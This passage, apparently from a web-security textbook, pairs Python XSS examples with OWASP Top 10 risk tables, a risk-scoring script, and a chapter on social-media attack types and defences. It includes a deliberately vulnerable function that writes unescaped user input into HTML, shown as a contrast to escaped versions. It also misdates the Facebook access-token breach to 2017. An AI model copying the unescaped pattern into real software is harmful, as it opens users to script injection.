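    with no validation or encoding, so the browser parses it as markup."""
    return f'<div class="comment">{comment}</div>'


def render_comment_hardened(comment: str) -> str:
    """'After' form for the HTML-body context: entity-encode & < > " ' so the
    browser treats the input as text, never as tags or script."""
    return f'<div class="comment">{html.escape(comment, quote=True)}</div>'


def render_profile_link_hardened(display_name: str, user_id: str) -> str:
    """Attribute context: the value is quoted and quotes are encoded, so the
    input cannot terminate the attribute and introduce another one."""
    safe_name = html.escape(display_name, quote=True)
    safe_id = html.escape(user_id, quote=True)
    return f'<a title="{safe_name}" href="/users/{safe_id}">{safe_name}</a>'


def untrusted_survives_verbatim(rendered: str, untrusted: str) -> bool:
    """Review/test check: True when the raw untrusted string appears unchanged
    in the output, i.e. no output encoding was applied on that path."""
    return untrusted in rendered


if __name__ == "__main__":
    print(render_comment_vulnerable(UNTRUSTED_COMMENT))
    print(render_comment_hardened(UNTRUSTED_COMMENT))
    print(render_profile_link_hardened('Bob" x="y', "42"))
```

The encoding has to match the context into which the data is written: `html.escape` is adequate for text nodes and quoted attribute values, but data placed inside a URL or a JavaScript block needs the encoding of that context instead, which is why the browser-side sanitizers cited in this book's references are described as context-aware.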

1.3.3 Mapping Vulnerabilities with Risk Rating Methods

As we have illustrated in Figure 1.9, various risk paths may exist in web applications which may be exploited by various threat agents (or attackers). Each of these paths comprises several steps, such as exploitation of the vulnerability using an attack payload (exploitation), identification of the vulnerability and its dominance (identification and dominance), and its impact on the business. Therefore, to assess the top 10 most dangerous vulnerabilities against these steps, Table 1.2 highlights the evaluation scheme for each of the steps identified [18].

TABLE 1.2 Evaluation Scheme of Risk Path Identified

Threat Agents: specific to the application context
Exploitation: Easy / Average / Difficult
Vulnerability Dominance: Rare / Normal / Broad
Vulnerability Identification: Simple / Moderate / Hard
Impact: Low / Medium / High

It is crucial to understand a web application vulnerability before a solution can be fabricated. Hence, Table 1.3 illustrates the mapping between each web application vulnerability and its risk path as per the steps shown in Table 1.2. Threat agents may be specific to the application context; therefore, each of the vulnerabilities can be exploited differently and may impose impacts of low to high severity.

1.4 TOWARD BUILDING SECURE WEB APPLICATIONS

Heretofore, we reviewed the most severe and dominant web application vulnerabilities, including the risk factors that these vulnerabilities can impose on any organization. In this section, we evaluate each web application vulnerability from a generalized perspective and determine its measurement against the identified risk factors.

These vulnerabilities exist in almost every web application, and their impact depends on the proficiency of the attacker in triggering an attack and on the type of organization. A small vulnerability may be catastrophic for one organization but may not pose a serious impact on another. Table 1.4 presents this evaluation for the identified vulnerabilities. As the aftereffects of any attack may vary, there is a need to develop secure web applications from the development stage itself. There are some stages/activities that can be incorporated in the development cycle. Let's discuss these stages.

• Identification and Management of Risk: This stage deals with the detection of risks that may be exploited in applications once they are released. The organization uses Dynamic Application Security Testing (DAST) to obtain the findings that help in creating and monitoring risk metrics. These metrics assist in risk analysis so that remediation solutions can be prioritized.
• Secure Patch Release Assurance: Amendment is an ongoing activity; every application must be updated over time. Therefore, this stage ensures that any newly released component or patch of the application is secure, i.e. it does not add a new vulnerability or risk path to the current secure version of the application. The organization employs Static and Dynamic Application Security Testing (SAST and DAST) to achieve the main goal of this stage. It also assures that the remediation solutions implemented by the organization succeed in restricting the risk.
• Empowering Application Developers: This activity supports the organization by reducing the number of vulnerabilities that may arise due to the neglect of secure coding by developers. Under this, the organization provides training on application security tools to developers so that security issues can be detected and removed before they go unnoticed in any version release. Training sessions may be conducted depending upon the risks identified in applications and released patches. For this, a questionnaire survey may be conducted by the security experts within the organization.

TABLE 1.3 Mapping of Web Application Vulnerabilities with Risk Path

V1. Injection
Exploitation: An injection flaw, for instance SQL injection, LDAP injection, or OS injection, is the result of the insertion of malicious data into the web application via any input field like a post, comment, form field, etc. Any data can act as a malicious attack vector, including environment variables, URL parameters, etc.
Dominance and Identification: Injection vulnerabilities dominate in all kinds of web applications. An injection may occur in the form of SQL, LDAP, NoSQL, XPath, XML parsers, object-relational mapping queries, etc. It can be easily identified through the use of scanners and code examination.
Impacts: It results in the loss of confidentiality and integrity. It may shut down the entire system, leading to denial of access and control hijacking. Business-related impacts depend upon the context of the application and the data used.

V2. Broken Authentication
Exploitation: Attackers bypass the authentication method by utilizing various techniques like dictionary-based attacks, brute force for mapping IDs and passwords, and so on.
Dominance and Identification: This attack is ubiquitous due to the implementation of identity validation and access control. The attacker can easily detect this vulnerability manually and utilize automatic mechanisms to exploit it.
Impacts: The attacker gains control of the user account, or of the entire system if the admin is compromised. Depending on the context of the application, it may be social identity cloning, breach of user privacy, or financial fraud.

V3. Sensitive Data Exposure
Exploitation: Deciphering is a complex task to achieve. Therefore, an attacker performs attacks to steal secret keys or performs passive attacks like eavesdropping and man-in-the-middle attacks to steal sensitive information.
Dominance and Identification: This vulnerability exists either because no cryptosystem is used or because a weak mechanism is used for secret key generation and encryption. A server-side vulnerability is easy to detect when data is in transit; however, it is difficult to do so for data at rest.
Impacts: This attack completely compromises the individual's privacy, which includes sensitive data like credit card numbers, health-related information, and any information which must be kept secret from a person's perspective.

V4. XML External Entities (XXE)
Exploitation: The attacker can exploit this vulnerability either by using an abused XML parser or by inserting malicious data into the XML document, exploiting vulnerable code or any dependency on external references.
Dominance and Identification: During XML processing, many older XML parsers require the origin of external references to be specified. Source code analysis is done to identify this vulnerability by checking for any dependencies or integration. Many automated tools are also used to find out whether the vulnerability exists in the web application.
Impacts: The attack results in remote access to the system, data disclosure, port scanning, and DoS attacks. Its severity may vary as per the application context, depending upon the privacy requirement.

V5. Broken Access Control
Exploitation: The attacker can utilize static or dynamic application testing to figure out whether access control policies are enforced properly or not. Gaining unauthorized access is the hard-core task of the attacker.
Dominance and Identification: This vulnerability is commonly found due to flaws in functional testing and ineffective access control policy regulation. Along with static and dynamic testing, manual testing is an effective approach to detect ineffective access control.
Impacts: The attacker impersonates a legitimate user, gaining access to their data, and may modify or destroy data, i.e. a masquerade attack. Its severity may vary as per the application context, depending upon the privacy requirement.

V6. Security Misconfiguration
Exploitation: The attacker identifies default insecure configurations like unpatched errors, accounts with default configuration, and insecure files to gain control of the system.
Dominance and Identification: This vulnerability is commonly found at any level in the application, like the database, networking services, web server, storage, and application server. It can be recognized easily with the help of automated scanners that scan for insecure configurations, use of accounts with default configurations, etc.
Impacts: This vulnerability allows the attacker to gain access to data in an unauthorized way or sometimes to gain control of the entire system. The severity level depends on the level of security requirement in the application context.

V7. Cross-Site Scripting (XSS)
Exploitation: The attacker may utilize freely available frameworks or tools to detect XSS vulnerabilities in the web application.
Dominance and Identification: Almost one-third of web applications are vulnerable to this attack. They can be detected with the help of automated scanners.
Impacts: An XSS attack results in account hijacking, phishing, disclosure of data, misuse of personal information, etc.

V8. Insecure Deserialization
Exploitation: This attack is difficult to trigger; the attacker may alter some of the parameters that result in redirection to an object which the attacker is not authorized to use.
Dominance and Identification: As it is not prevalent so far, its detection requires human intervention; however, some tools exist to detect insecure deserialization.
Impacts: This attack may result in remote code execution, which leads to system control or a system crash.

V9. Using Components with Known Vulnerabilities
Exploitation: The attacker can easily find an exploit for the known vulnerability. Some tasks need to be performed to check for new vulnerabilities.
Dominance and Identification: Applications that use more third-party components without proper validation are more affected by this attack. Automated scanners aid in identifying it, but new exploitation may require effort.
Impacts: Depending upon the context of the application, this attack may cause severe harm, including the loss of data and personal information.

V10. Insufficient Logging and Monitoring
Exploitation: This vulnerability sets the foundation for a large number of attacks. The attacker takes advantage of insufficient logging and the lack of monitoring of networking-related activities to achieve their motive.
Dominance and Identification: One way to detect this flaw is by careful monitoring of events along with penetration testing. All results must be logged properly to realize the damage. It takes a longer time to detect.
Impacts: The attacker is capable of launching some large attacks and extracting or destroying data, as the lack of monitoring is a plus point for the attacker.

TABLE 1.4 Evaluation of Web Application Vulnerabilities against Risk Factors

Vulnerability   Exploitation (Risk)   Dominance   Identification   Impacts (Vulnerability Abuse)
V1              Easy                  Normal      Simple           High
V2              Easy                  Normal      Moderate         High
V3              Average               Broad       Moderate         High
V4              Average               Normal      Simple           High
V5              Average               Normal      Moderate         High
V6              Easy                  Broad       Simple           Medium
V7              Easy                  Broad       Simple           Medium
V8              Difficult             Normal      Moderate         High
V9              Average               Broad       Moderate         Medium
V10             Average               Broad       Hard             Medium
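Tables 1.2 and 1.4 give each vulnerability a label for exploitation, dominance, identification, and impact, but no combined score, so the ranking that the labels imply is left to the reader. The Python below is an added example, not code from the book or from OWASP: it assumes the scoring convention of the OWASP Top 10 2017 methodology (each likelihood factor and the impact scored 1 to 3, risk = average likelihood x impact) mapped onto the book's own labels, encodes the rows of Table 1.4 (with V6's dominance read as "Broad"), ranks the ten vulnerabilities, and rejects any row whose labels fall outside the scheme of Table 1.2. The function names and the numeric scale are assumptions.

```python
# Added example: OWASP-2017-style risk scoring over the rows of Table 1.4.
# Scale assumption: every factor scores 1 (least risky) to 3 (most risky),
# as in the OWASP Top 10 2017 methodology; the label names are the book's.
EXPLOITATION = {"Easy": 3, "Average": 2, "Difficult": 1}
DOMINANCE = {"Broad": 3, "Normal": 2, "Rare": 1}
IDENTIFICATION = {"Simple": 3, "Moderate": 2, "Hard": 1}  # easier to find = riskier
IMPACT = {"High": 3, "Medium": 2, "Low": 1}

# Rows of Table 1.4: (exploitation, dominance, identification, impact).
TABLE_1_4 = {
    "V1": ("Easy", "Normal", "Simple", "High"),
    "V2": ("Easy", "Normal", "Moderate", "High"),
    "V3": ("Average", "Broad", "Moderate", "High"),
    "V4": ("Average", "Normal", "Simple", "High"),
    "V5": ("Average", "Normal", "Moderate", "High"),
    "V6": ("Easy", "Broad", "Simple", "Medium"),
    "V7": ("Easy", "Broad", "Simple", "Medium"),
    "V8": ("Difficult", "Normal", "Moderate", "High"),
    "V9": ("Average", "Broad", "Moderate", "Medium"),
    "V10": ("Average", "Broad", "Hard", "Medium"),
}


def likelihood(exploitation: str, dominance: str, identification: str) -> float:
    """Average of the three likelihood factors on the 1-3 scale."""
    return (EXPLOITATION[exploitation] + DOMINANCE[dominance]
            + IDENTIFICATION[identification]) / 3


def risk_score(exploitation: str, dominance: str,
               identification: str, impact: str) -> float:
    """Risk = likelihood x technical impact, rounded to one decimal."""
    return round(likelihood(exploitation, dominance, identification) * IMPACT[impact], 1)


def validate_labels(table=TABLE_1_4) -> list:
    """Return the ids of rows whose labels are outside Table 1.2's scheme
    (this is how a transcription slip such as 'Brad' would be caught)."""
    bad = []
    for vid, (e, d, i, m) in table.items():
        if (e not in EXPLOITATION or d not in DOMINANCE
                or i not in IDENTIFICATION or m not in IMPACT):
            bad.append(vid)
    return bad


def rank_vulnerabilities(table=TABLE_1_4) -> list:
    """[(id, score), ...] from highest to lowest risk; ties keep table order."""
    scored = [(vid, risk_score(*row)) for vid, row in table.items()]
    return sorted(scored, key=lambda item: -item[1])  # sorted() is stable


if __name__ == "__main__":
    for vid, score in rank_vulnerabilities():
        print(f"{vid:>4}  {score:4.1f}")
```

Run as a script it prints V1 at the top with 8.0 and V10 at the bottom with 4.0, which is the ordering of the OWASP 2017 list itself; the scores also make the trade-off in Table 1.4 visible: V6 and V7 are rated easy, broad, and simple to find, yet their medium impact leaves them level with V5, whose high impact offsets a harder likelihood profile.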

1.5 CHAPTER SUMMARY

Every business domain depends on the internet for expanding its business boundaries. This has led to the emergence of a large number of web applications available on the internet. Security is no longer optional while developing an application. Insecure development raises various security challenges. Therefore, the focus of this chapter has been to elaborate on the most dominant web application vulnerabilities. It has shown various statistics unveiled by different pioneering security organizations. This chapter provided a comprehensive overview of the top 10 most harmful vulnerabilities, which are the most dominant and are being exploited every year despite the deployment of defensive solutions. It inferred that there are some security loopholes in web applications which present new risk paths. Furthermore, this chapter described each of the vulnerabilities against these risk paths. Prevention is better than cure; therefore, attending to security aspects during the development phase helps organizations to understand the current scenario and chart a course toward improvement.

REFERENCES
1. Apache Software Foundation. (2019) Apache web server. [online] Available at: https://httpd.apache.org/docs/2.4/howto/.
2. Babiker, M., Karaarslan, E., & Hoscan, Y. (2018, March). Web application attack detection and forensics: A survey. In 2018 6th International Symposium on Digital Forensic and Security (ISDFS) (pp. 1–6). IEEE.
3. Brunil, D., Romero, M., Haddad, H. M., & Molero, A. E. (2009). A methodological tool for asset identification in web applications. In IEEE Fourth International Conference on Software Engineering Advances (pp. 413–418).
4. Chaudhary, P., & Gupta, B. B. (2018). Plague of cross-site scripting on web applications: A review, taxonomy and challenges. International Journal of Web Based Communities, 14(1), 64–93.
5. Gupta, B., Agrawal, D. P., & Yamaguchi, S. (eds.). (2016). Handbook of Research on Modern Cryptographic Solutions for Computer and Cyber Security. IGI Global.
6. Gupta, B. B. (ed.). (2018). Computer and Cyber Security. Principles, Algorithm, Applications, and Perspectives. CRC Press.
7. Gupta, B. B., Gupta, S., & Chaudhary, P. (2017). Enhancing the browser-side context-aware sanitization of suspicious HTML5 code for halting the DOM-based XSS vulnerabilities in cloud. International Journal of Cloud Applications and Computing (IJCAC), 7(1), 1–31.
8. Gupta, B. B., Gupta, S., Gangwar, S., Kumar, M., & Meena, P. K. (2015). Cross-site scripting (XSS) abuse and defense: Exploitation on several testing bed environments and its defense. Journal of Information Privacy and Security, 11(2), 118–136.
9. Gupta, B. B., & Sheng, Q. Z. (eds.). (2019). Machine Learning for Computer and Cyber Security: Principle, Algorithms, and Practices. CRC Press.
10. Gupta, S., & Gupta, B. B. (2015). BDS: Browser dependent XSS sanitizer. In Handbook of Research on Securing Cloud-Based Databases with Biometric Applications (pp. 174–191). IGI Global.
11. Gupta, S., & Gupta, B. B. (2015, May). PHP-sensor: A prototype method to discover workflow violation and XSS vulnerabilities in PHP web applications. In Proceedings of the 12th ACM International Conference on Computing Frontiers (p. 59). ACM.
12. Gupta, S., & Gupta, B. B. (2016). Enhanced XSS defensive framework for web applications deployed in the virtual machines of cloud computing environment. Procedia Technology, 24, 1595–1602.
13. Gupta, S., & Gupta, B. B. (2016). JS-SAN: Defense mechanism for HTML5-based web applications against JavaScript code injection vulnerabilities. Security and Communication Networks, 9(11), 1477–1495.
14. Gupta, S., & Gupta, B. B. (2016). XSS-SAFE: A server-side approach to detect and mitigate cross-site scripting (XSS) attacks in JavaScript code. Arabian Journal for Science and Engineering, 41(3), 897–920.
15. Lawton, G. (2007). Web 2.0 creates security challenges. IEEE Computer Society, 40(10), 13–16.
16. McClure, S., Shah, S., & Shah, S. (2017). Web Hacking: Attacks and Defense. Addison-Wesley Professional.
17. Microsoft IIS web server. [online] Available at: https://stackify.com/iis-web-server/.
18. OWASP. OWASP Top 10 2017: The ten most critical web application security risks. [online] Available at: https://www.owasp.org/images/b/b0/OWASP_Top_10_2017_RC2_Final.pdf.
19. Seth, F., Jeremiah, G., Robert, H., Anton, R., & Petko, D. P. (2011). XSS Attacks: Cross Site Scripting Exploits and Defense. Elsevier.
20. Toch, E., Bettini, C., Shmueli, E., Radaelli, L., Lanzi, A., Riboni, D., & Lepri, B. (2018). The privacy implications of cyber security systems: A technological survey. ACM Computing Surveys, 51(2), 36.
21. Web application vulnerability statistics report [online]. Available at: https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Web-Vulnerabilities-2017-eng.pdf.
22. Web application vulnerability statistics report. (2018). [online] Available at: https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Web-Vulnerabilities-2018-eng.pdf.
23. White hat security report. [online] Available at: https://info.whitehatsec.com/rs/675-YBI-674/images/WHS%202017%20Application%20Security%20Report%20FINAL.pdf.
CHAPTER 2

Security Challenges in Social Networking
Taxonomy and Statistics

This chapter describes the facts behind the numerous forms of attacks triggered by threat agents through exploiting the vulnerabilities discussed in Chapter 1. This chapter primarily focuses on the most popular and highly used web applications on the internet, i.e. Online Social Networking (OSN) sites. Firstly, we discuss the related statistics on the popularity of social media and the attack incidents on it. Moreover, we have divided social media attacks into major categories. Finally, we bring to light the major contributions or approaches that have been proposed by researchers to provide security to users on social media.

2.1 INTRODUCTION

Although social media has emerged within a short span of time, it has attracted millions of internet users and has become the most popular use of the internet globally. With the development of the web as a content-based platform, social media is the only digital place which revolves around user-generated information. The Online Social Network (OSN) has emerged as a logical location for its billions of users. Here they can expand their relationship boundaries across the globe [4, 36]. It facilitates socialization by enabling new links with loved ones or restoring vanished ones. Moreover, this platform can be employed by different organizations as a digital platform to enlarge their business through advertising, and for entertainment purposes, education, and so on. The most prominent services provided by OSN are illustrated in Figure 2.1.

2.1.1 Statistics of Social Networking

Recent years have shown remarkable growth in OSNs, which collect information from more than half a billion registered users. Figure 2.2 reflects that OSNs engage almost 80 percent of active internet users, who share their day-to-day information in the form of posts, statuses, videos, photos, and so on [27].

Over the last decade, social media platforms such as Facebook and Twitter have attracted a large portion of the world's population by providing services such as personal account maintenance, communication with one another, and discovering the profiles of other persons with similar interests, behaviors, or nature. Figure 2.3 highlights statistics on the number of users gained by different social media platforms [30].

FIGURE 2.1 Prominent services of OSN.

Security Challenges in Social Networking ◾ 31

FIGURE 2.2 Popularity of OSN among internet users.

A report by the Pew Research Center in 2018 [27] observed that a major portion of the population in America is addicted to Facebook and YouTube, whereas the majority of adults are using Snapchat and Instagram. The usage and popularity of different social media platforms depend heavily on the age factor and the major proportion of the population. Figure 2.4 reflects the related statistics unveiled by the same report: OSN usage among teenagers is 88%, whereas it is 78% among adults, who spend their leisure time on OSN to stay connected with the world.

2.1.2 Recent Incidents on Social Networking Platforms

The increasing popularity of OSN-based web sites is being exploited by attackers to harm a larger number of online active users. The characteristics of OSN that make it the main focus for attackers are: (1) the high concentration of its topology, (2) the use of enhanced and advanced web development technologies like AJAX and JavaScript for more interactive applications, and (3) a stronger trust relationship among nodes than in general networks. Figure 2.5 shows the number of vulnerabilities identified on some of the social media platforms.

FIGURE 2.3 Number of users engaged by different social media platforms.

FIGURE 2.4 Percentage of users by age group by Pew Research Center.

FIGURE 2.5 Total number of vulnerabilities detected on social media platforms.

These hidden vulnerabilities not only affect the usage and popularity of social media but also affect users' privacy and security. Recently, in 2017, hackers attacked one of the most used social platforms, Facebook. It has been reported [16] that almost 50 million users' accounts were compromised because of a serious vulnerability detected in the site. Users' sensitive information was leaked, and various unusual activities were performed. This was a severe case, as the attackers stole the "access token", which allowed the attacker to remain logged on to Facebook in multiple sessions without needing to enter the password. Twitter also discovered a vulnerability in its support system in November 2018. This led to the leakage of its users' data. Specifically, the attackers identified a flaw that helped in getting the geographical location of the user. Figure 2.6 presents some of the vulnerabilities recognized on the Twitter platform.

FIGURE 2.6 Vulnerabilities detected on Twitter platform.

Millions of Instagram users were hacked in 2018. Hackers logged all of the affected users out of their accounts and changed their details like user name, email address, profile picture, and other details. Users were unable to log in again to their respective accounts. This issue affected the popularity of Instagram and somewhat affected the number of active users on Instagram. In 2019 [33], a buffer overflow vulnerability (CVE-2019-3568) was found in WhatsApp, which is a highly utilized social media platform with approximately 1.5 billion daily active users. It was also infected by spyware, which exploits the WhatsApp calling function. This leads to the leakage of sensitive data residing with the user. Multiple malware families are infecting social media nowadays and are the major reason behind data breaches on social media. The malware families identified on social media are shown in Figure 2.7.

2.2 DISTINCT ATTACK CLASSES OF SOCIAL PLATFORM

There are plenty of attacks triggered by different hacker communities or attackers on the digital platform of social media. Social media facilitates social relationships across the globe. Its usage has increased to an extent that it imposes serious threats to the security and privacy of the user. Social media attacks have been classified into regular attacks, contemporary attacks, and specific attacks that are particular to social media. Figure 2.8 shows the different classes of attacks on social media [8, 28, 29].

Table 2.1 describes each of these attacks briefly. Regular attacks are a major concern and have been in the limelight since the development of the internet. They include phishing, spamming, malware, XSS attacks, and many more [9, 10, 13, 14, 15, 18]. Contemporary attacks are modern attacks triggered by the attacker on social media, like de-anonymization attacks, identity clone attacks, inference attacks, and so on. Specific attacks include attacks specific to the social networking platform such as cyber stalking, online exploitation, cyber bullying, and so on. There are numerous attacks triggered by the attacker using hidden vulnerabilities. Social media is the most attractive platform to launch and easily disseminate various malware and attacks. There is always a trade-off between the advanced features provided and keeping the security and privacy of the users high.

FIGURE 2.7 Malware families identified on social media (%).

FIGURE 2.8 Classes of social media attacks.

TABLE 2.1 Description of Social Media Attacks

Regular Attacks

1. Phishing [2, 32]: This attack exploits the trust of the user in any web application on the internet. It creates a similar, trustworthy-looking interface and environment to lure the victim into entering sensitive credentials like user ID, passwords, credit/debit card information, and many more. Users on social media are more likely to fall for this attack, as the attacker masquerades as a trusted friend of the victim.

2. Malware [35]: These are illicit computer programs developed with the intent to steal the user's sensitive information, to gain remote access to the victim's machine, to completely destroy the machine, or to perform some other malicious activity. The different malware categories include viruses, worms, Trojan horses, backdoors, spyware, adware, etc. Social media is an easy platform for an attacker to propagate malware and infect more users by exploiting the social relationships of the user.

3. Spamming [34]: Spamming means sending bogus messages in large quantities to the victim. In the case of social media, spammers create fake accounts to spread fake news or messages. They spread unwanted advertisements or comments on pages which are highly viewed by the users of social media. Facebook and YouTube are the most exploited platforms for spamming.

4. Clickjacking [29]: An attack where victims are persuaded to click a link which the attacker uses to hide malicious content. The users are fooled into clicking a link which seems trustworthy but is not. Attackers use this technique to spread spam messages or to steal money from the account. For example, Twitter was hit by a clickjacking attack in 2009 through the spreading of "Don't Click" messages with a URL. Users got infected by clicking on this link, and the message went viral.

5. De-anonymization [21]: Anonymization is the method of hiding the real identity of the user behind pseudonyms, so the attacker uses a de-anonymization attack to reveal the original identity of the user. The attacker utilizes information such as network topology, group membership information, tracking cookie information, and so on. Social media is the main target of this attack, as the attacker or a third party may reveal the original identity by examining the available information.

6. Inference Attack [5]: In this attack, the attacker infers private information of the user by mining information available publicly on social media, such as information related to the user's social relationships, data revealed by the user's friends, etc.

7. Social Bots [7]: These are fake profiles developed by the attacker, either automatic or semi-automatic, that behave similarly to a human while performing activities on social media. Social bots send friend requests to the user and, on acceptance, may start gathering the user's private information. Consequently, the user's privacy gets violated.

8. Cross-Site Scripting [6]: A code injection vulnerability in which the attacker injects a malicious script into a web page. Whenever the user visits that web page, the script gets executed by the web browser and the attacker obtains the user's sensitive credentials like the session token, cookie information, ID and password, and other information. Various attack vectors are used by the attacker, such as JavaScript attack vectors, CSS, HTML tag attack vectors, and many more.

Contemporary Attacks

9. Identity Clone Attack [19]: In this attack, the attacker duplicates the user's profile on either the same social platform or another platform. It helps in gaining personal information of the cloned user's friends. The attacker may perform malicious activities in the guise of the victim, such as cyber stalking, online exploitation, etc.

10. Socware [8]: A type of malware which is used to spread fake messages using the victim's profile. The victim is tempted to install socware-embedded applications by being offered some rewards. Then, it sends messages to the victim's friends, aiding in propagation and message dissemination.

11. Location Leakage [22]: Social media users frequently post pictures, revealing their location information to malicious users. The attacker uses this information to stalk the victim physically, which may be dangerous to the user. Smartphone usage is the main cause of this type of breach.

12. Spear Phishing [3, 17]: A kind of phishing attack, but one that targets an individual, an organization, or a business. The victim gets spam messages that seem to come from a specific source instead of a generalized source as in the case of a phishing attack. The victim may be redirected to the attacker's site to steal private information or to gain access to the organization's network.

13. Sybil Attack [1]: In this attack, the attacker creates multiple fake accounts on social media to influence a large number of users, which helps in gaining access to confidential information.

14. Information Leakage: Information sharing is one of the dominant features of social media. Users share their personal as well as professional information digitally. This may somehow violate their privacy, as a third party like an insurance company may use this data about its clients to increase their premiums or to deny their payments after learning their health status. Attackers may also use this information to hurt the user.

15. Privacy Breach through Tagging [24]: Privacy on social media depends not only on the sharing of data by the user but also on friends' activity. Your identity may get revealed if someone in your friends list tags you in his uploaded photographs. It is a much-discussed issue faced by the users of social media nowadays. Some social media platforms give their users the privilege to add more information along with tagging. This adds to the privacy breach issues of the users.

16. Threats from Multimedia Data: Social platforms allow a user to share data including multimedia content such as photos and videos of good quality. Therefore, malicious users may easily obtain information like the location of the victim, recognition through face, and so on. This may bring potential damage to the victim.

Specific Attacks

17. Online Exploitation [26]: It is a highly concerning matter regarding the usage of social media. Online exploitation means harassing someone digitally, either through delivering harmful content such as pornography and other sexual content to the victim or through making connections with young children to sexually exploit them. Here, malicious users may target minors, as they are highly prone to such activities due to their age and limited understanding.

18. Cyber Stalking [23]: Cyber stalking means following someone on a digital platform with harmful intentions. The attackers may utilize the information disclosed by the victim on social media, such as address, phone number, email ID, DOB, and other information available through the friends of the victim. Users frequently post their status including images and videos, revealing location information to the stalker, who may perform dangerous attacks. This might cause mental imbalance or depression in the victim.

19. Corporate Espionage: It means keeping an eye on the employees of an organization to get sensitive information. It helps in performing social engineering attacks on social media. It may be performed to harm either the employee or the organization by revealing confidential information through the employee.

20. Cyber Bullying [31]: It means causing harm to anyone intentionally through sending unwanted messages, revealing personal pictures publicly, sexual comments, or involvement in some other harmful activity. Social media is a highly used platform for such activities, as the attacker can easily spread fake news about the victim using the links and network topology of the social network.

2.3 SOCIAL NETWORK DESIGN VS. PRIVACY AND SECURITY GOALS

In this section, we will discuss the architecture of the social network. Social media is a highly diverse and sophisticated platform allowing users to remain socially active. A social network utilizes either of two architectures, namely client-server architecture or P2P (peer-to-peer) architecture. Let us discuss each briefly:

• Client-Server Architecture: This infrastructure uses a centralized server to provide different services to the user like storage and maintenance, but it becomes a single point of failure. Different social media features are facilitated by different providers like Facebook, Twitter, and so on. However, to overcome the limitations of this type of architecture, researchers have designed decentralized architectures for the social network.
• P2P Architecture: In this architecture, the role of the central server is distributed to each storage node, and the direct exchange of information between nodes is supported. Here, privacy is greater, but global search in a distributed manner is a challenging task.

There are three main pillars of network security: confidentiality, integrity, and availability (CIA) [11, 12, 20, 25]. When we are talking in the context of social media, each one of them may have many perspectives. First, we will have a brief look at what these different perspectives are.

• Confidentiality or Privacy: It is highly desirable in social media to protect against the unauthorized disclosure of sensitive information related to its users. Privacy of the user depends on the user's perspective. It may have different scenarios according to the type of social platform the user is using, such as: (a) using pseudonyms to hide the real identity of the user on social media like dating platforms but not on professional networks like LinkedIn, (b) applying privacy settings on the profile to restrict visibility to only friends, but keeping it public if using matrimonial sites, and (c) obtaining the consent of the user before using his sensitive information, even by the social network service provider. It requires more focus on access control and anonymity methods.
• Integrity: Integrity in terms of social networking may be viewed as keeping consistency between real-life social relationships and online social relationships. The attacker may disrupt this consistency in two ways: first, by cloning the identity of a legitimate user; second, by creating many fake identities to harm the reputation system of the social media. Integrity requires the proper authentication of users.
• Availability: It means information shared or posted by the user must be available to the user at the time of its demand. Other security features like accountability must be assured by the social media service provider.

Social media is popular among internet users because of its services like sociability. However, the design goals are in conflict with the security and privacy of the social users. Now, we will look briefly into what these conflicts are.

(a) Enhanced Searching Capabilities vs. Privacy: Exploring the digital space is the main feature of an OSN to facilitate socialization. For social search, more personal data of the user must be disclosed in order to give more efficient and accurate results, but this violates the security and privacy rules of the OSN. So there is a trade-off between search capabilities and privacy. A more efficient security mechanism means a higher likelihood of privacy breaches. For social traversal, the privacy of user data also gets affected by the public display of social connections. Social contact information can be used by adversaries to infer more sensitive and private data of the user. For example, "A" has encrypted his profile and it is accessible only to his friends, while his friends list is publicly open to facilitate social traversal. The attackers can infer common traits from A's friends list like his age, occupation, and so on.
(b) Privacy vs. Social Connection: The main functionality of an OSN is to provide easy methods for social interactions. But if this is done in an uncontrolled manner, then it may lead to the violation of user privacy. Suppose you have hidden your identity publicly by using an anonymous identifier, but your friend has uploaded a picture with you, tagged you with your real name, and also commented about your designation; then, unknowingly, your friend has revealed your identity and occupation publicly.
(c) Privacy vs. Data Mining: An OSN stores a huge amount of data of approximately half a billion registered users in its database. This information can be used for social and marketing analysis. It can also be used to optimize OSN services and customize them with respect to the user's interests. This way the attacker may intrude on the privacy of the OSN and may recover most users' identities. So there is a trade-off between the quality of the results of data mining and the privacy requirements of the OSN's users.
(d) Architectural Conflicts: The client-server architecture of a social network is more advantageous than the P2P model in satisfying most of the design goals of social media. It supports easy social space exploration, and users can easily find their lost social connections as the data of all users is centrally stored. But it becomes a single point of failure and attracts hackers. So the P2P architecture has strengthened the privacy of the user by distributing the user's information on the user nodes themselves, which also enforces the privacy rules and can encrypt the data.

2.4 SOLUTIONS TO PREVENT AGAINST SOCIAL MEDIA ATTACKS

In this section, we provide a comprehensive overview of the solutions available to prevent attacks on social media. As it is a fascinating platform for various kinds of attacks, it attracts the attention of many researchers, social media operators, and commercial security developers to design preventive solutions against the mentioned attacks. Table 2.2 highlights the social network service provider solutions and commercial solutions [8, 28]. We highlight the most effective solutions, but all of these require the user's awareness in the background. The user is the owner of his information, and to keep his privacy, he must possess the knowledge of what to share, with whom to share, and where to share his private information.

TABLE 2.2 Different Techniques to Prevent against Social Media Attacks

Social Media Service Provider Solutions

1. Embedded Protection Techniques: Many social media platforms provide inbuilt security features to protect against multiple attacks; for example, the Facebook Immune System (FIS) detects spam on Facebook.

2. Notification to User: Social media service providers can notify users, mainly young children, in an attempt to protect them from harassment on the network; for example, Facebook uses a "panic button" for this purpose.

3. Enhanced Security and Privacy Settings: Social networks provide customizable security settings which the user can adjust according to the level of privacy needed. For instance, a user may set his profile to be disclosed only to his friends. Google+ provides this feature through creating different circles as per the nature of the members included.

4. Advanced Authentication Methods: In order to ensure the authenticity of the social user, many social media platforms introduce advanced authentication mechanisms such as 2-factor authentication, use of CAPTCHA during login to protect against social bots, and so on. These methods also prevent account hijacking and the use of the account for malicious purposes.

5. Improved User Interfaces for Privacy Settings: Many solutions have been designed for maintaining the security and privacy of the user. Better protection can be achieved if the user knows about the information that is available publicly to other users of the social network. Therefore, the user interface can be upgraded to show the information accessible to anyone, so that the user can apply security settings properly.

Commercial Solutions

6. Network Security Solutions: Many organizations like AVG, Cisco, McAfee, Kaspersky, and Norton provide security solutions to protect against various attacks like identity theft, malware injection, and bot creation. Many solutions have been developed, like Cisco Identity Services Engine to authenticate the user before using internet services, antiviruses, firewalls, email security, Cisco next-generation IDS, and so on.

7. AVG PrivacyFix: It is basically a mobile app or browser extension to configure the user's privacy settings. It also restricts online tracking of the user.

